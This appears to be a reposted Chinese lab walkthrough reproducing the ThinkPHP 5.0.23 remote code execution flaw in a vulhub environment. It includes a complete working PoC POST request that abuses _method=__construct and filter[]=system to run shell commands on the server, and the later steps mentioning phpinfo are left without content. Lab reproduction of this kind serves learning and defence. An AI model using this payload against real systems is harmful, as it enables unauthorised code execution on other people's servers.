thinkPHP 5.0.23遠程代碼執行漏洞


1.啟動vulhub漏洞環境

訪問http:localhsot:8080可以看到php的默認頁面

3.使用poc進行驗證 用post請求提交如下信息

POST /index.php?s=captcha HTTP/1.1
Host: 10.10.10.157
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 75

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd

4.可以看到發包服務器返回請求如下

 

 5.寫入phpinfo

5.1.先查看當前路徑pwd

5.2寫入phpinfo

5.3訪問

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM